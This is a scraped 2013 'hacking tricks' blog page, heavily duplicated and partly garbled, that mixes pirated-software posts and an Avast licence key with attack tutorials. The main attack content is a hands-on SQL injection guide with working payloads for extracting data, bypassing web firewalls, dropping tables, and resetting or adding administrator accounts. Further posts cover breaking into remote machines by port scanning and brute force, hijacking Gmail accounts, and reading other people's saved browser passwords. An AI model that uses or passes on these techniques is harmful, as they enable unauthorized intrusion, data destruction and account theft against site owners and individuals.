Wednesday, 31 July 2013
How to like all the posts on your Timeline
hello friend, facebook is most commonly used social networking website now a days you
can post,share ,comment etc.as youknow when you open yourfacebook id you got lot of stuff/post on your wall & i think its very clumsy ,irritating to like all thepost by clicking on each post .
so the solution is ,If you try to be over-social keeping up with your friends and liking everyone of their post then here is a relief for you.You can now simply like all the posts on your wall by just clicking a simple button on your Chrome.
All you need to do is to Goto this site and install this Extension http://www.chromeextensions.org/social-communications/facebook-like-all/
A quick and easy way to likeevery comment or status on your current Facebook page. One click and everything is‘Liked ’ for you .
Get Latest Windows 7 Genuine Advantage Validation 2013 Free Download
Windows Genuine Advantage (WGA) program is part of the commitment by Microsoft to protect its customers and partners from counterfeiters through education, engineering, and enforcement of policies and laws. WGA differentiates the value of genuine Windows software from counterfeitsoftware. This enables you to enjoy the capabilities that you expect, the confidence that your software is authentic, and the ongoing system improvements that help you do more with your personal computer.The WGA program creates an improved Windows experience for users who have a genuine copy of Windows. By using genuine Microsoft software, you can be confident that you will have access to the latest features, security, and support. This helps improve your productivity and expand the capabilities of your computer. You will also have access to innovations and offerings available only to genuine Microsoft software customers.
Enjoy and Support Developers, Buy It, They Deserved It!
Link to download:
And if it asks password then the pass is : www.shakzone.blogspot.com
Tuesday, 30 July 2013
EA Cricket 2012 Full PC Game Free Download
EA Cricket 2012 Full pc game free download
Reqiurements:
Cpu: 1.0 GHz
Ram: 256 MB
Video Memory: 32 MB
Windows Xp,7,Vista
HDD: 1.2 GB
Download now:
Part 1:Click Here to Download part 1
Part2:Click here to download part2
Enjoy!!! and keep visiting
Ram: 256 MB
Video Memory: 32 MB
Windows Xp,7,Vista
HDD: 1.2 GB
Download now:
Part 1:Click Here to Download part 1
Part2:Click here to download part2
Enjoy!!! and keep visiting
Licence key upto 2038,,,,,Avast!!!
Licence Key For Avast..!
Licence Key Upto 2038..
Enjoy...
…
.
.
.
.
.
.
Key :-
W6754380R9978A0
910-4TZ59467
Licence Key Upto 2038..
Enjoy...
…
.
.
.
.
.
.
Key :-
W6754380R9978A0
910-4TZ59467
Sunday, 28 July 2013
HOW TO HACK REMOTE COMPUTER USING IP ADDRESS
The Internet Protocol is the principal communications protocol used for relaying datagram (packets) across an
internetwork using the Internet Protocol Suite. Responsible for routing packets across network boundaries, it is the primary protocol that establishes the Internet.
internetwork using the Internet Protocol Suite. Responsible for routing packets across network boundaries, it is the primary protocol that establishes the Internet.
IP is the primary protocol in the Internet layer of the Internet Protocol Suite and has the task of delivering
datagrams from the source host to the destination host solely based on their addresses. For this Purpose, IP defines addressing methods and structures for datagram encapsulation
datagrams from the source host to the destination host solely based on their addresses. For this Purpose, IP defines addressing methods and structures for datagram encapsulation
You may want to hack the website and put your advertisement there or grab some database information In this type of hacking, you are playing with the web server’s computer instead of the administrator’s computer. Because, www.website.com is hosted in separate web server rather than personal computer.
Another can be accessing your friend’s computer from your home. Again this is IP based and this is possible only when your friend’s computer is online. If it is off or not connected to internet then remote IP hacking is totally impossible.
Well, both of the hacking has the same process. Let’s summarize what we must do.
- Confirm the website or a computer you want to hack.
- Find or trace their IP address.
- Make sure that IP address is online
- Scan for open ports
- Check for venerable ports
- access through the port
- Brute-force username and password
Now let me describe in brief in merely basic steps that a child can understand it.
First, getting the IP address of victim.
To get the IP address of the victim website, ping for it in command prompt.
For example,
ping www.google.com
will fetch the IP address of Google.com
This is how we can get the IP address of the victims website.
How about your friend’s PC? You can’t do www.yourfirend’sname.com, can you? Finding your friend’s IP address is little tough job, and tougher it is if he has dynamic IP address that keeps changing.
One of the widely used method to detect IP address of your friend is by chatting with him.
How about your friend’s PC? You can’t do www.yourfirend’sname.com, can you? Finding your friend’s IP address is little tough job, and tougher it is if he has dynamic IP address that keeps changing.
One of the widely used method to detect IP address of your friend is by chatting with him.
If u know the ip address? Is it online? To know the online status just ping the IP address, if it is online it will reply.
If the IP address is online, scan for the open ports. Open ports are like closed door without locks, you can go inside and outside easily.
Use Advanced Port Scanner (password Is www.cyberelite.in)to scan all open and venerable ports.
If the IP address is online, scan for the open ports. Open ports are like closed door without locks, you can go inside and outside easily.
Use Advanced Port Scanner (password Is www.cyberelite.in)to scan all open and venerable ports.
Now you’ve IP address and open port address of the victim, you can now use telnet to try to access them. Make sure that you’ve telnet enabled in your computer or install it from Control panel > Add remove programs > add windows components.
Now open command prompt and use telnet command to access to the IP address. Use following syntax for connection.
Now open command prompt and use telnet command to access to the IP address. Use following syntax for connection.
telnet [IP address] [Port]
You’ll be asked to input login information.
If you can guess the informations easily then it’s OK. Or you can use some brute-forcing tools like http://www.hackingspirits.com/eth-hac/tools/brute_force.html
In this way you’ll able to hack remove computer using only IP address
Now you are in!! enjoy!!!
Posted by HaXoR
Saturday, 27 July 2013
Find Serial key of any software
this is a little trick that i usually use to find cd keys with Google.
If you‘re looking for a serial number for Nero (for example) go to google.com and type Nero 94FBR and it'll bring it up this works great in Google.
HOW DOES THIS WORK?
Quite simple really.
94FBR is part of a Office 2000 Pro cd key that is widely distributed as it bypasses the activation requirements of Office 2K Pro.
By searching for the product name and 94fbr, you guarantee two things.
1)The pages that are returned are pages dealing specifically with the product you're wantinga serial for. 2)Because 94FBR is part of a serial number, and only part of a serial number, you guarantee
If you‘re looking for a serial number for Nero (for example) go to google.com and type Nero 94FBR and it'll bring it up this works great in Google.
HOW DOES THIS WORK?
Quite simple really.
94FBR is part of a Office 2000 Pro cd key that is widely distributed as it bypasses the activation requirements of Office 2K Pro.
By searching for the product name and 94fbr, you guarantee two things.
1)The pages that are returned are pages dealing specifically with the product you're wantinga serial for. 2)Because 94FBR is part of a serial number, and only part of a serial number, you guarantee
FACEBOOK PRANKS
1. First Copy this link and Send it
to your friend.
www.sinthaistudio.com/thehouse/alrena
2. Lie him that it is a Profile of a
dead person (somehow scare him
with your story)
3. Ask him to click on the
“photos” option to check the
image and ask him to wait some
seconds.
4. When he is trying to click there,
this Ghost animation will be on
screen suddenly.
to your friend.
www.sinthaistudio.com/thehouse/alrena
2. Lie him that it is a Profile of a
dead person (somehow scare him
with your story)
3. Ask him to click on the
“photos” option to check the
image and ask him to wait some
seconds.
4. When he is trying to click there,
this Ghost animation will be on
screen suddenly.
Thursday, 25 July 2013
Full Page Script
Assalam o alaikum!!! guyzzz today i,m going to tell you ,,how to put full page script to ur blog ,,,first of all goto blogger.com,,..
Click on Layout ,,,then u will see something like Add gadget ,,click on that ,,it will open a window scroll down ,,there will be java/html script ,,now click on plus(+) button and paste the in that ,,,
after domains add your blog link and enjoyyyyyyyyyyyy!!!
<script type="text/javascript">
var adfly_id = 4637926;
var adfly_advert = 'int';
var exclude_domains = ['For example.com'];
</script>
<script src="https://cdn.adf.ly/js/link-converter.js"></script>
Click on Layout ,,,then u will see something like Add gadget ,,click on that ,,it will open a window scroll down ,,there will be java/html script ,,now click on plus(+) button and paste the in that ,,,
after domains add your blog link and enjoyyyyyyyyyyyy!!!
<script type="text/javascript">
var adfly_id = 4637926;
var adfly_advert = 'int';
var exclude_domains = ['For example.com'];
</script>
<script src="https://cdn.adf.ly/js/link-converter.js"></script>
How to have only first name on facebook
Facebook first name UPDATED !
Note: I don't care if this tutorial has been made before, I'm making one so deal with it.
now for the people who wanna know, this is how to make your Facebook account show your first name only.
Things you'll need:
-A brain
-Mozilla Firefox
-Common Sense
Okay, first open up Mozilla Firefox
Now do you see settings at the bottom? Click it
It should open up a window
When you see "Network" click that.
Now it should open up this window!
Go to "Configure how FireFox connects to the internet"
it should open up with window
It "manual proxy" and put in THIS IP 27.123.4.106 and for the port put 8080
Now when you did that tick the box for "use proxy for all protocols" and then hit ok.
Now go to Facebook
"http://www.facebook.com/"
Sign into your account
Go to "Account settings"
Scroll down to Language and change it from "English" or whatever language you have to:
"Bahasa Indonesian" which is located NEAR THE TOP.
Save it, THEN go to your name change, erase the last name and hit save and there you go you have a first name only on Facebook.
MAKE SURE YOU DO THIS ALL IN FIREFOX. WHEN YOU'RE DONE GET RID OF PROXY(If you want).
Thanks for reading this tutorial and hopefully I helped ONE person out.
How To Hack Saved Password In Firefox
How to do ?
1. Open Firefox Web Broweser
2. Then Click on FireFox > Option > Option as shown in below picture
3. Then a POP Up box will appear, In that go to security and click on Show Passwords as show below.
4. Now click on website whose password you want to see ans click on show password as shown in below image. (Note: It will ask for confirmation so click on yes when dialog box appears)
5. Done, You have hacked password of your victim with few simple steps. You can try this at school computer lab if someone have saved their password.
1. Open Firefox Web Broweser
2. Then Click on FireFox > Option > Option as shown in below picture
3. Then a POP Up box will appear, In that go to security and click on Show Passwords as show below.
4. Now click on website whose password you want to see ans click on show password as shown in below image. (Note: It will ask for confirmation so click on yes when dialog box appears)
5. Done, You have hacked password of your victim with few simple steps. You can try this at school computer lab if someone have saved their password.
Wednesday, 24 July 2013
How to make money with androids or iphone
Today i m going to teach u about making money by ur android or ios device
to earn money just go to following link by ur android or ios device and download it
and when it asks for code in starting enter code - 0uz3pl
http://featurepoints.com/web/
Posted by HaXoR
Convert your text into Audio (notepad tricks)
Today I am going to tell you another notepad trick. If you want to convert your text in to audio you have to use any programmes. But from this method you don't want to use another software. An easy trick from Notepad.
Let's start.
Open notepad.
Copy the code bellow.
Dim msg, sapi
msg=InputBox("Enter your text for Conversation | Tool by HaXoR (http://hackingwithkingmaker.blogspot.com)","PC Hacks Text-To-Audio Converter")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg
Now save it as text_audio.vbs
And that's it.
Now open the file and type anything. Then click OK.
Problems related to SQL Injection
SQL Injection:
most problems while doing SQL injection and solutions to them. Probably every person who has looked at tutorials to hack a website have noticed that there are too much SQL tutorials. Almost every forum has 10 tutorials and blogs 5 tutorials about SQL injection, but actually those tutorials are stolen from somewhere else and the author doesn't probably even know why does SQL injection work. All of those tutorials are like textbooks with their ABC's and the result is just a mess. Everyone are writing tutorials about SQL, but nobody covers the problems what will come with that attack.
What is the cause of most problems related to SQL injection?
Webdevelopers aren't always really dumb and they have also heard of hackers and have implemented some security measures like WAF or manual protetion. WAF is an Web application firewall and will block all malicous requests, but WAF's are quite easy to bypass. Nobody would like to have their site hacked and they are also implementing some security, but ofcourse it would be false to say that if we fail then it's the servers fault. There's also a huge possibility that we're injecting otherwise than we should.
A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. By customizing the rules to your application, many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified.
Order by is being blocked?
It rarely happens, but sometimes you can't use order by because the WAF has blocked it or some other reasons. Unfortunally we can't skip the order by and we have to find another way. The way is simple, instead of using Order by we have to use Group by because that's very unlikely to be blacklisted by the WAF.
If that request will return 'forbidden' then it means it's blocked.
http://site.com/gallery?id=1 order by 100--
Then you have to try to use Group by and it will return correct :
http://site.com/gallery?id=1 group by 100-- / success
Still there's an possibility that WAF will block the request, but there's on other way also and that's not very widely known. It's about using ( the main query ) = (select 1)
http://example.org/news.php?id=8 and (select * from admins)=(select 1)
Then you'll probably recive an error like this : Operand should contain 5 column(s).
That error means there are 5 columns and it means we can proceed to our next step what's union select. The command was different than usual, but the further injection will be the same.
http://site.com/news.php?id=-8 union select 1,2,3,4,5--
'order by 10000' and still not error?
That's an small chapter where I'll tell you why sometimes order by won't work and you don't see an error. The difference between this capther and the last one is that previously your requests were blocked by the WAF, but here's the injection method is just a littlebit different. When I saw that on my first time then I thought how does a Database have 100000 columns because I'm not getting the error while the site is vulnerable?
The answer is quite logical. By trying order by 1000000 we're not getting the error because there are so many columns in there, we're not getting the error because our injecting isn't working.
Example : site.com/news.php?id=9 order by 10000000000-- [No Error]
to bypass this you just have to change the URL littlebit.Add ' after the ID number and at the end just enter +
Example :
site.com/news.php?id=9' order by 10000000--+[Error]
If the last example is working for you then it means you have to use it in the next steps also, there isn't anything complicated, but to make everything clear I'll still make an example.
http://site.com/news.php?id=-9' union select 1,2,3,4,5,6,7,8--+
Extracting data from other database.
Sometimes we can inject succesfully and there doesn't appear any error, it's just like a hackers dream. That dream will end at the moment when we'll see that there doesn't exist anything useful to us. There are only few tables and are called "News", "gallery" and "articles". They aren't useful at all to us because we'd like to see tables like "Admin" or "Administrator". Still we know that the server probably has several databases and even if we have found the information we're looking for, you should still take a look in the other databases also.
This will give you Schema names.
site.com/news.php?id=9 union select 1,2,group_concat(schema_name),4 from information_schema.schemata
And with this code you can get the tables from the schema.
site.com/news.php?id=9 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=0x
This code will give you the column names.
site.com/news.php?id=9 union select 1,2,group_concat(column_name),4 from information_schema.tables where table_schema=0x and table_name=0x
I get error if I try to extract tables.
site.com/news.php?id=9 union select 1,2,group_concat(table_name),4 from information_schema.tables
Le wild Error appears.
"you have an error in your sql syntax near '' at line 1"
Change the URL for this
site.com/news.php?id=9 union select 1,2,concat(unhex(hex(table_name),4 from information_schema.tables limit 0,1--
How to bypass WAF/Web application firewall
The biggest reason why most of reasons are appearing are because of security measures added to the server and WAF is the biggest reason, but mostly they're made really badly and can be bypassed really easily. Mostly you will get error 404 like it's in the code below, this is WAF. Most likely persons who're into SQL injection and bypassing WAF's are thinking at the moment "Dude, only one bypassing method?", but in this case we both know that bypassing WAF's is different kind of science and I could write a ebook on bypassing these. I'll keep all those bypassing queries to another time and won't cover that this time.
"404 forbidden you do not have permission to access to this webpage"
The code will look like this if you get the error
http://www.site.com/index.php?id=-1+union+select+1%2C2%2C3%2C4%2C5--
[Error]
Change the url Like it's below.
http://www.site.com/index.php?id=-1+%2F%2A%21UnIoN%2A%2F+%2F%2A%21sELeCt%2A%2F1%2C2%2C3%2C4%2C5--
[No error]
Is it possible to modify the information in the database by SQL injection?
Most of people aren't aware of it, but it's possible. You're able to Update, Drop, insert and select information. Most of people who're dealing with SQL injection has never looked deeper in the attack than shown in the average SQL injection tutorial, but an average SQL injection tutorial doesn't have those statements added. Most likely because most of people are copy&pasting tutorials or just overwriting them. You might ask that why should one update, drop or insert information into the database if I can just look into the information to use the current ones, why should we make another Administrator account if there already exists one?
Reading the information is just one part of the injection and sometimes those other commands what are quite infamous are more powerful than we thought. If you have read all those avalible SQL injection tutorials then you're probably aware that you can read the information, but you didn't knew you're able to modify it. If you have tried SQL injecting then you have probably faced some problems that there aren't administrator account, why not to use the Insert command to add one? There aren't admin page to login, why not to drop the table and all information so nobody could access it? I want to get rid of the current Administrator and can't change his password, why not to use the update commands to change the password of the Administrator?
You have probably noticed that I have talked alot about unneccesary information what you probably don't need to know, but that's an information you need to learn and understand to become a real hacker because you have to learn how SQL databases are working to fiqure it out how those commands are working because you can't find tutorials about it from the network. It's just like math you learn in school, if you won't learn it then you'll be in trouble when you grow up.
Theory is almost over and now let's get to the practice.
Let's say that we're visiting that page and it's vulnerable to SQL injection.
http://site.com/news.php?id=1
You have to start injecting to look at the tables and columns in them, but let's assume that the current table is named as "News".
With SQL injection you can SELECT, DROP, UPDATE and INSERT information to the database. The SELECT is probably already covered at all the tutorials so let's focus on the other three. Let's start with the DROP command.
I'd like to get rid of a table, how to do it?
http://site.com/news.php?id=1; DROP TABLE news
That seems easy, we have just dropped the table. I'd explain what we did in the above statement, but it's quite hard to explain it because you all can understand the above command. Unfortunally most of 'hackers' who're making tutorials on SQL injection aren't aware of it and sometimes that three words are more important than all the information we can read on some tutorials.
Let's head to the next statement what's UPDATE.
http://site.com/news.php?id=1; UPDATE 'Table name' SET 'data you want to edit' = 'new data' WHERE column_name='information'--
Above explanation might be quite confusing so I'll add an query what you're most likely going to use in real life :
http://site.com/news.php?id=1; UPDATE 'admin_login' SET 'password' = 'Crackhackforum' WHERE login_name='Rynaldo'--
We have just updated Administrator account's password.In the above example we updated the column called 'admin_login" and added a password what is "Crackhackforum" and that credentials belongs to account which's username is Rynaldo. Kinda heavy to explain, but I hope you'll understand.
How does INSERT work?
Luckily "INSERT" isn't that easy as the "DROP" statement is, but still quite understandable. Let's go further with Administrator privileges because that's what most of people are heading to. Adding an administrator account would be like this :
http://site.com/news.php?id=1; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (2,'Rynaldo','Crackhackforum','NA')--
INSERT INTO 'admin_login' means that we're inserting something to 'admin_login'. Now we have to give instructions to the database what exact information we want to add, ('login_id', 'login_name', 'password', 'details') means that the specifications we're adding to the DB are Login_id, Login_name, password and details and those are the information the database needs to create a new account. So far we have told the database what information we want to add, we want to add new account, password to it, account ID and details. Now we have to tell the database what will be the new account's username, it's password and account ID, VALUES (2,'Rynaldo','Crackhackforum','NA')-- . That means account ID is 2, username will be Rynaldo, password of the account will be Crackhackforum. Your new account has been added to the database and all you have to do is opening up the Administrator page and login.
Passwords aren't working
Sometimes the site is vulnerable to SQL and you can get the passwords.Then you can find the sites username and password, but when you enter it into adminpanel then it shows "Wrong password".This can be because those usernames and passwords are there, but aren't working. This is made by site's admin to confuse you and actually the Cpanel doesn't contain any username/password. Sometimes are accounts removed, but the accounts are still in the database. Sometimes it isn't made by the admin and those credentials has been left in the database after removing the login page, sometimes the real credentials has been transfered to another database and old entries hasn't been deleted.
Sometimes i get some weird password
This weird password is called Hash and most likely it's MD5 hash.That means the sites admin has added more security to the website and has encrypted the passwords.Most popular crypting way is using MD5 hash.The best way to crack MD5 hashes is using PasswordsPro or Hashcat because they're the best and can crack the password even if it's really hard or isn't MD5. Also you can use http://md5decrypter.com/ .I don't like to be a person who's pitching around with small details what aren't correct, but here's an tip what you should keep in mind. The domain is saying it's "md5decryptor" what reffers to decrypting MD5 hashes. Actually it's not possible to decrypt a hash because they're having 'one-way' encryption. One way encryption means it can only be encrypted, but not decrypted. Still it doesn't mean that we can't know what does the hash mean, we have to crack it. Hashes can't be decrypted, only cracked. Those online sites aren't cracking hashes every time, they're saving already cracked hashes & results to their database and if you'll ask an hash what's already in their database, you will get the result.
Md5 hash looks like this : 827ccb0eea8a706c4c34a16891f84e7b = 12345
You can read about all Hashes what exist and their description http://pastebin.com/aiyxhQsf
Md5 hashes can't be decrypted, only cracked
How to find admin page of site?
Some sites doesn't contain admin control panel and that means you can use any method for finding the admin page, but that doesn't even exist. You might ask "I got the username and password from the database, why isn't there any admin login page then?", but sometimes they are just left in the database after removing the Cpanel.
Mostly people are using tools called "Admin page finders".They have some specific list of pages and will try them.If the page will give HTTP response 200 then it means the page exists, but if the server responds with HTTP response 404 then it means the page doesn't exist in there.If the page exist what is in the list then tool will say "Page found".I don't have any tool to share at the moment, but if you're downloading it yourself then be beware because there are most of those tools infected with virus's.
Mostly the tools I mentioned above, Admin Page Finders doesn't usually find the administrator page if it's costumly made or renamed. That means quite oftenly those tools doesn't help us out and we have to use an alternative and I think the best one is by using site crawlers. Most of you are probably having Acunetix Web Vulnerability scanner 8 and it has one wonderful feature called site crawler. It'll show you all the pages on the site and will %100 find the login page if there exists one in the page.
Automated SQL injection tools.
Automated SQL injection tools are programs what will do the whole work for you, sometimes they will even crack the hashes and will find the Administrator page for you. Most of people are using automated SQL injection tools and most popular of them are Havij and SQLmap. Havij is being used much more than SQLmap nomatter the other tool is much better for that injection. The sad truth why that's so is that many people aren't even able to run SQLmap and those persons are called script-kiddies. Being a script-kiddie is the worstest thing you can be in the hacking world and if you won't learn how to perform the attack manually and are only using tools then you're one of them. If you're using those tools to perform the attack then most of people will think that you're a script-kiddie because most likely you are. Proffesionals won't take you seriusly if you're injecting with them and you won't become a real hacker neither. My above text might give you an question, "But I've seen that even Proffesional hackers are using SQLmap?" and I'd like to say that everything isn't always black & white. If there are 10 databases, 50 tables in them and 100 columns in the table then it would just take days to proccess all that information.I'm also sometimes using automated tools because it makes my life easier, but to use those tools you first have to learn how to use those tools manually and that's what the tutorial above is teaching you.
Use automated tools only to make your life easier, but don't even look at them if you don't know how to perform the attack manually.
What else can I do with SQL injection besides extracting information?
There are many things besides extracting information from the database and sometimes they are much more powerful. We have talked above that sometimes the database doesn't contain Administrator's credentials or you can't crack the hashes. Then all the injection seems pointless because we can't use the information we have got from the database. Still we can use few another methods. Just like we can conduct CSRF attack with persistent XSS, we can also move to another attacks through SQL injection. One of the solution would be performing DOS attack on the website which is vulnerable to SQL injection. DOS is shortened from Denial of service and it's tottaly different from DDOS what's Distributed Denial of Service. I think that you all probably know what these are, but if I'm taking that attack up with a sentence then DOS will allow us to take down the website temporarely so users wouldn't have access to the site. The other way would be uploading our shell through SQL injection. If you're having a question about what's shell then by saying it shortly, it's a script what we'll upload to the server and it will create an backdoor for us and will give us all the privileges to do what we'd like in the server and sometimes by uploading a shell you're having more rights to modify things than the real Administrator has. After you have uploaded a shell you can move forward to symlink what means we can deface all the sites what are sharing the same server. Shelling the website is probably most powerful thing you can use on the website. I have not covered how to upload a shell through SQL injection and haven't covered how to cause DOS neither, but probably will do in my next tutorials because uploading a shell through SQL is another kind of science, just like bypassing WAF's. Those are the most common methods what attackers will put in use after they can't get anything useful out of the database. Ofcourse every website doesn't have the same vulnerabilities and they aren't responding always like we want and by that I mean we can't perform those attacks on all websites.We have all heard that immagination is unlimited and you can do whatever you'd like. That's kinda true and hacking isn't an exception, there are more ways than I can count.
What to do if all the information doesn't display on the page?
I actually have really rarely seen that there are so much information on the webpage that it all just don't fit in there, but one person recently asked that question from me and I decided to add it here. Also if you're having questions then surely ask and I'll update the article. If we're getting back to the question then the answer is simple, if all the information can't fit in the screen then you have to look at the source code because everything displayed on the webpage will be in there. Also sometimes information will appear in the tab where usually is the site's name. If you can't see the information then sometimes it's hiddened, but with taking a deeper look you might find it from the source. That's why you always have to look all the solutions out before quiting because sometimes you might think "I can't inject into that..", but actually the answer is hiddened in the source.
What is the purpose of '--' in the union+select+1,2,3,4,5-- ?
I suggest to read about null-byte's and here's a good explanation about it : http://en.wikipedia.org/wiki/Null_character because it might give you some hint why -- is being used . Purpose of adding -- in the end of the URL isn't always neccesary and it depends on the target. It doesn't have any influence to the injection because it doesn't mean anything, but it's still being used because it's used as end of query. It means if I'm injecting as : http://site.com/news.php?id=-1 union select 1,2,3,4,5-- asasdasd then the server will skip everything after -- and asasdasd won't be readed. It's just like adding to masking a shell. Sometimes injection isn't working if -- is missing because -- tells the DB that "I'm the end of query, don't read anything what comes after me and execute everything infront of me". It's just like writing a sentence without a dot, people might think it's not the end of your sentence and will wait until you write the other part of the sentence and the end will come if you add the dot to your sentence.
Tips for a secure password
The first step in protecting your online privacy is creating a safe password - i.e. one that a computer program or persistent individual won't easily be able to guess in a short period of time. To help you choose a secure password, we've created a feature that lets you know visually how safe your password is as soon as you create it.
Tips for creating a secure password:
Include punctuation marks and/or numbers.
Mix capital and lowercase letters.
Include similar looking substitutions, such as the number zero for the letter 'O' or '$' for the letter 'S'.
Create a unique acronym.
Include phonetic replacements, such as 'Luv 2 Laf' for 'Love to Laugh'.
Things to avoid:
Don't reuse passwords for multiple important accounts, such as Gmail and online banking.
Don't use a password that is listed as an example of how to pick a good password.
Don't use a password that contains personal information (name, birth date, etc.)
Don't use words or acronyms that can be found in a dictionary.
Don't use keyboard patterns (asdf) or sequential numbers (1234).
Don't make your password all numbers, uppercase letters or lowercase letters.
Don't use repeating characters (aa11).
Tips for keeping your password secure:
Never tell your password to anyone (this includes significant others, roommates, parrots, etc.).
Never write your password down.
Never send your password by email.
Periodically test your current password and change it to a new one.
Tips for a secure password
The first step in protecting your online privacy is creating a safe password - i.e. one that a computer program or persistent individual won't easily be able to guess in a short period of time. To help you choose a secure password, we've created a feature that lets you know visually how safe your password is as soon as you create it.
Tips for creating a secure password:
Include punctuation marks and/or numbers.
Mix capital and lowercase letters.
Include similar looking substitutions, such as the number zero for the letter 'O' or '$' for the letter 'S'.
Create a unique acronym.
Include phonetic replacements, such as 'Luv 2 Laf' for 'Love to Laugh'.
Things to avoid:
Don't reuse passwords for multiple important accounts, such as Gmail and online banking.
Don't use a password that is listed as an example of how to pick a good password.
Don't use a password that contains personal information (name, birth date, etc.)
Don't use words or acronyms that can be found in a dictionary.
Don't use keyboard patterns (asdf) or sequential numbers (1234).
Don't make your password all numbers, uppercase letters or lowercase letters.
Don't use repeating characters (aa11).
Tips for keeping your password secure:
Never tell your password to anyone (this includes significant others, roommates, parrots, etc.).
Never write your password down.
Never send your password by email.
Periodically test your current password and change it to a new one.
posted by (HaXoR)
Tips for creating a secure password:
Include punctuation marks and/or numbers.
Mix capital and lowercase letters.
Include similar looking substitutions, such as the number zero for the letter 'O' or '$' for the letter 'S'.
Create a unique acronym.
Include phonetic replacements, such as 'Luv 2 Laf' for 'Love to Laugh'.
Things to avoid:
Don't reuse passwords for multiple important accounts, such as Gmail and online banking.
Don't use a password that is listed as an example of how to pick a good password.
Don't use a password that contains personal information (name, birth date, etc.)
Don't use words or acronyms that can be found in a dictionary.
Don't use keyboard patterns (asdf) or sequential numbers (1234).
Don't make your password all numbers, uppercase letters or lowercase letters.
Don't use repeating characters (aa11).
Tips for keeping your password secure:
Never tell your password to anyone (this includes significant others, roommates, parrots, etc.).
Never write your password down.
Never send your password by email.
Periodically test your current password and change it to a new one.
posted by (HaXoR)
Tips for a secure password
The first step in protecting your online privacy is creating a safe password - i.e. one that a computer program or persistent individual won't easily be able to guess in a short period of time. To help you choose a secure password, we've created a feature that lets you know visually how safe your password is as soon as you create it.
Tips for creating a secure password:
Include punctuation marks and/or numbers.
Mix capital and lowercase letters.
Include similar looking substitutions, such as the number zero for the letter 'O' or '$' for the letter 'S'.
Create a unique acronym.
Include phonetic replacements, such as 'Luv 2 Laf' for 'Love to Laugh'.
Things to avoid:
Don't reuse passwords for multiple important accounts, such as Gmail and online banking.
Don't use a password that is listed as an example of how to pick a good password.
Don't use a password that contains personal information (name, birth date, etc.)
Don't use words or acronyms that can be found in a dictionary.
Don't use keyboard patterns (asdf) or sequential numbers (1234).
Don't make your password all numbers, uppercase letters or lowercase letters.
Don't use repeating characters (aa11).
Tips for keeping your password secure:
Never tell your password to anyone (this includes significant others, roommates, parrots, etc.).
Never write your password down.
Never send your password by email.
Periodically test your current password and change it to a new one.
Tips for creating a secure password:
Include punctuation marks and/or numbers.
Mix capital and lowercase letters.
Include similar looking substitutions, such as the number zero for the letter 'O' or '$' for the letter 'S'.
Create a unique acronym.
Include phonetic replacements, such as 'Luv 2 Laf' for 'Love to Laugh'.
Things to avoid:
Don't reuse passwords for multiple important accounts, such as Gmail and online banking.
Don't use a password that is listed as an example of how to pick a good password.
Don't use a password that contains personal information (name, birth date, etc.)
Don't use words or acronyms that can be found in a dictionary.
Don't use keyboard patterns (asdf) or sequential numbers (1234).
Don't make your password all numbers, uppercase letters or lowercase letters.
Don't use repeating characters (aa11).
Tips for keeping your password secure:
Never tell your password to anyone (this includes significant others, roommates, parrots, etc.).
Never write your password down.
Never send your password by email.
Periodically test your current password and change it to a new one.
Tuesday, 23 July 2013
Hack Any gmail account
Getting Straight to the tut
step 1: first signout of your gmail account .
step 2: go to "I Cannot Access My Account " tab which is below the password field
step 3: go to Yopmail and enter any random name eg:ron
and then click check inbox
and leave it open.
step 4: On "I Cannot Access My Account " page in Gmail just click forgot my username and go to username recovery page.
Step 5: Enter The Yopmail email you just opened eg :
Step 6: now click check for new emails tab in yopmail you will get all the gmail id's associated with it eg you'll get some gmail id's like xx@gmail.com copy that id
step 7: just go again to the "I Cannot Access My Account " in gmail and this time choose forgot my password and go to password recovery page
step 8:Now Enter The Gmail Id You Copied xx@gmail.com in username
fill the captcha and everything
step9: If The Gmail Password recovery ever asks a security question then no need to panic !
look below the security question there will be a tab link send the reset password link to my recovery email
step 10:just go to the yopmail inbox again and click on the link gmail posted and reset their gmail password
VOILA !! You Just hacked A Gmail Account
Posted by (HaXoR)
step 1: first signout of your gmail account .
step 2: go to "I Cannot Access My Account " tab which is below the password field
step 3: go to Yopmail and enter any random name eg:ron
and then click check inbox
and leave it open.
step 4: On "I Cannot Access My Account " page in Gmail just click forgot my username and go to username recovery page.
Step 5: Enter The Yopmail email you just opened eg :
Step 6: now click check for new emails tab in yopmail you will get all the gmail id's associated with it eg you'll get some gmail id's like xx@gmail.com copy that id
step 7: just go again to the "I Cannot Access My Account " in gmail and this time choose forgot my password and go to password recovery page
step 8:Now Enter The Gmail Id You Copied xx@gmail.com in username
fill the captcha and everything
step9: If The Gmail Password recovery ever asks a security question then no need to panic !
look below the security question there will be a tab link send the reset password link to my recovery email
step 10:just go to the yopmail inbox again and click on the link gmail posted and reset their gmail password
VOILA !! You Just hacked A Gmail Account
Posted by (HaXoR)
Saturday, 20 July 2013
How to change the password of any pc without knowing the current one
Changing computers User Password
Without Knowing the Current
Password
If you want to change the user
password on your Windows compute
but you don’t know what the current
password is, there is an easy way to
do this. First of all, the user that you
are on has to be an administrator
user. To determine what type of user
your are logged in with go to Start >
Control Panel > User Accounts. At the
bottom of the window you will see
the different users that are on your
computer. Find your user and under
the user name it will say what type of
user account you are. Your user
needs to be a computer adminstrator
to change the password without
knowing the current password.
Let’s get started!
1. Click on the Start button and
select “Run”
The Run window will appear. Type
into it the text, “cmd” (without the
quotes). Click OK
2. The CMD window nd will appear.
Type “net user”
A list of all the users that are on the
computer will appear.
3. Type the following: net user
<enter user name here without these
brackets> *
For example, if the user I want to
change passwords for is Mike, I would
type in:
net user Mike *
4. Press enter and you will be asked
to type in a new password.
Type in your new password. The
cursor will not move nore will it seem
like anything is happening but your
new password will be entered.
5. You will be asked to confirm your
new password. Enter it again and
press enter.
Congratulations, you have just
changed the password of your
Windows user without knowing the
current password!Posted by (HaXoR)
Without Knowing the Current
Password
If you want to change the user
password on your Windows compute
but you don’t know what the current
password is, there is an easy way to
do this. First of all, the user that you
are on has to be an administrator
user. To determine what type of user
your are logged in with go to Start >
Control Panel > User Accounts. At the
bottom of the window you will see
the different users that are on your
computer. Find your user and under
the user name it will say what type of
user account you are. Your user
